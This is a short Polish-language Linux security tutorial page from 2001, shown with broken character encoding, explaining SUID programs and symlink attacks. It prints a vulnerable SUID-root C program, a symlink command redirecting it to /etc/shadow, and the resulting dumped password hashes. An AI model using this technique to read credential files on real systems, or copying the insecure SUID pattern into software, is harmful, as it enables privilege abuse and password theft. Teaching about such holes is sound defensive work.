Bezpiecze±stwo system≤w Linux'owych

Linux Security - Suidy
Strona g│≤wna

Dowi▒zania symboliczne
[1] [2] [3] [4] [5]
Program typu SUID mo┐e wy╢wietliµ zawarto╢µ pliku, kt≤rego w│a╢cicielem jest zwyk│y u┐ytkownik.

Przyk│adowy program mo┐e wygl▒daµ tak jak ten poni┐ej:
[root@localhost]# cat ankieta.c
void main()
{
system ("/bin/cat /home/tronix/.form.cfg");
}
[root@localhost]# ls -l /bin/ankieta
-rwsr-sr-x   1 root     root   16728 Jul 28  1999 finger

[root@localhost]# cat /home/tronix/.form.cfg
		Ankieta
Imie:Jan
Nazwisko:Kowalski
Adres:Warszawa ul.Wyspia±skiego 43
Zazwyczaj uruchomienie takiego programy nie stwarza ┐adnych zagro┐e± dla bezpiecze±stwa
[root@localhost]# ankieta
	Ankieta
Imie:Jan
Nazwisko:Kowalski
Adres:Warszawa ul.Wyspia±skiego 43
Gdy w│amywacz jednak wie do jakiego pliku program siΩ odwo│uje i potrafi to umiejΩtnie wykorzystaµ to efekty s▒ takie:
[tronix@localhost]$ ln -s -f /etc/shadow ~/.form.cfg
[tronix@localhost]$ ankieta
root:zttJEkXo/9XCM:11389:0:99999:7:::
bin:*:11389:0:99999:7:::
daemon:*:11389:0:99999:7:::
Oczywi╢cie to jest tylko bardzo prosty przyk│ad i sam program mo┐e byµ o wiele bardziej rozbudowany (mo┐e np. stwarzaµ mo┐liwo╢µ zapisu do pliku co praktycznie daje zwyk│emu u┐ytkownikowi nieograniczone mo┐liwo╢ci).

ICMP - Pine - Fork - Firewall - Bezpieczne partycje
Suidy - Skanowanie - Word exportable - Backdoor'y - Sumy kontrolne
Perl - Logrotate - Shell przez WWW - Forum - KsiΩga go╢ci - Statystka - Linki

Kontakt: tronix@2com.pl
Copyright by Tronix (c)2001 All Rights Reserved